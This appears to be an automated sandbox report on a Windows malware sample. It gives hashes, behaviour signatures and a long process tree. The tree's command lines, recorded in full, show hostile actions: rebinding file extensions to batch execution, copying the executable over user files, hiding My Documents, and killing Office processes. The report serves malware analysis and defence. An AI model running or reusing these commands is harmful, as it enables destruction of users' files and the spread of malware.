Analysis

max time kernel: 123s
max time network: 154s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 07-04-2024 21:00

Static task: static1
Behavioral task: behavioral1
Sample: e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe
Resource: win7-20240221-en
General

Target: e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe
Size: 5.5MB
MD5: e5d8fd3aeb2df221386026d477c9a29f
SHA1: b0282c62eb15642255d4dcf7709a5480ba49c04c
SHA256: e528a7df88f2edb9a6b9d125fcf360ec4232de036f2ce9ef40c6183b957371e5
SHA512: e5ba2b989683672dfd02cfddf685dca91964c0a4cc89a9b398090485cc47e67a6df585c1f4e0a1c3b77b62ce65deb7122b71309226589a586167464b3967f638
SSDEEP: 6144:btzsb5Uh28+V1WW69B9VjMdxPedN9ug0z9TB9SToScEMdFDIDIDVPQW9e7w4x4Qc:btzE5elwLz9TrszMnGGVoxU
Malware Config

Signatures
Drops file in Drivers directory (4 IoCs)
Processes: cmd.exe
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | cmd.exe
  File created                 | C:\Windows\SysWOW64\drivers\gmreadme.txt | cmd.exe
  File opened for modification | C:\Windows\System32\drivers\gmreadme.txt | cmd.exe
  File created                 | C:\Windows\System32\drivers\gmreadme.txt | cmd.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in System32 directory (64 IoCs)
Processes: cmd.exe
Drops file in Program Files directory (64 IoCs)
Processes: cmd.exe, cmd.exe
Drops file in Windows directory (64 IoCs)
Processes: cmd.exe, cmd.exe
Modifies registry class (10 IoCs)
Processes: cmd.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile" | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.png\ = "batfile" | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile" | cmd.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf               | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile" | cmd.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3               | cmd.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile" | cmd.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4               | cmd.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.png               | cmd.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.txt               | cmd.exe
Suspicious use of WriteProcessMemory (27 IoCs)
Processes: e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe, cmd.exe
  description | pid | process | target process
  PID 2648 wrote to memory of 2896 | 2648 | e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe | cmd.exe
  PID 2648 wrote to memory of 2896 | 2648 | e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe | cmd.exe
  PID 2648 wrote to memory of 2896 | 2648 | e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe | cmd.exe
  PID 2896 wrote to memory of 2356 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2356 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2356 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2376 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2376 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2376 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 956  | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 956  | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 956  | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 1440 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 1440 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 1440 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2656 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2656 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2656 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2664 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2664 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2664 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2528 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2528 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2528 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2536 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2536 | 2896 | cmd.exe | cmd.exe
  PID 2896 wrote to memory of 2536 | 2896 | cmd.exe | cmd.exe
Views/modifies file attributes (1 TTPs, 1 IoCs)

Processes
[depth 1] C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe  (PID 2648)
  Command line: "C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"
  Signatures: Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\system32\cmd.exe  (PID 2896)
    Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B36.tmp\9B37.tmp\9B38.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"
    Signatures: Modifies registry class; Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2356)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2376)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

    [depth 3] C:\Windows\system32\cmd.exe  (PID 956)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

    [depth 3] C:\Windows\system32\cmd.exe  (PID 1440)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2656)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2664)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""
      Signatures: Drops file in Program Files directory; Drops file in Windows directory

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2528)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2536)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""
      Signatures: Drops file in Drivers directory; Drops file in System32 directory; Drops file in Program Files directory; Drops file in Windows directory

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2964)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2560)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

    [depth 3] C:\Windows\system32\attrib.exe  (PID 1012)
      Command line: attrib +h "C:\Users\Admin\my documents"
      Signatures: Views/modifies file attributes

    [depth 3] C:\Windows\system32\tskill.exe  (PID 2488)
      Command line: tskill WINWORD

    [depth 3] C:\Windows\system32\tskill.exe  (PID 2468)
      Command line: tskill excel

    [depth 3] C:\Windows\system32\tskill.exe  (PID 2104)
      Command line: tskill msaccess

    [depth 3] C:\Windows\system32\cmd.exe  (PID 2360)
      Command line: C:\Windows\system32\cmd.exe /K crash.bat

      [depth 4] C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe  (PID 588)
        Command line: C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe

        [depth 5] C:\Windows\system32\cmd.exe  (PID 828)
          Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8FC1.tmp\8FC2.tmp\8FC3.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"

      [depth 4] C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe  (PID 776)
        Command line: C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe

        [depth 5] C:\Windows\system32\cmd.exe  (PID 472)
          Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\952E.tmp\952F.tmp\9530.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"

          [depth 6] C:\Windows\system32\cmd.exe  (PID 484)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

          [depth 6] C:\Windows\system32\cmd.exe  (PID 1336)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

          [depth 6] C:\Windows\system32\cmd.exe  (PID 2920)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

          [depth 6] C:\Windows\system32\cmd.exe  (PID 796)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

      [depth 4] C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe  (PID 1204)
        Command line: C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe

        [depth 5] C:\Windows\system32\cmd.exe  (PID 268)
          Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9897.tmp\9898.tmp\9899.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"

          [depth 6] C:\Windows\system32\cmd.exe  (PID 332)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

          [depth 6] C:\Windows\system32\cmd.exe  (PID 1700)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

          [depth 6] C:\Windows\system32\cmd.exe  (PID 456)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y "

          [depth 6] C:\Windows\system32\cmd.exe  (PID 1872)
            Command line: C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""

      [depth 4] C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe  (PID 1028)
        Command line: C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9231.tmp\9232.tmp\9233.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1172
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2968
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98A7.tmp\98A8.tmp\98A9.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2252
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1160
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2780
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8FD1.tmp\8FD2.tmp\8FD3.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1492
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:936
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1432
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B17.tmp\9B18.tmp\9B29.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:1572
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1728
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:108
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:572
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9E04.tmp\9E05.tmp\9E06.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2256
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1440
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9CCD.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:768
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1620
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9CCC.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1828
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2744
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:764
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B07.tmp\9B08.tmp\9B09.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2576
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2688
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2420
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A9A.tmp\9A9B.tmp\9A9C.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2240
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:1372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2348
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A9B.tmp\9AAB.tmp\9AAC.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2888
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:1724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2600
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1924
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98C7.tmp\98C7.tmp\98D8.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2024
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:156
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2428
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98C6.tmp\98C7.tmp\98C8.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:1600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2588
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9CCE.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1784
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2536
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2664
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:2760
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9C7E.tmp\9D3A.tmp\9D3B.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:1084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2996
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe4⤵PID:1580
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\98E5.tmp\98E6.tmp\98E7.bat C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe"5⤵PID:2244
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:908
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "6⤵PID:2912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe "%j:%k""6⤵PID:2380
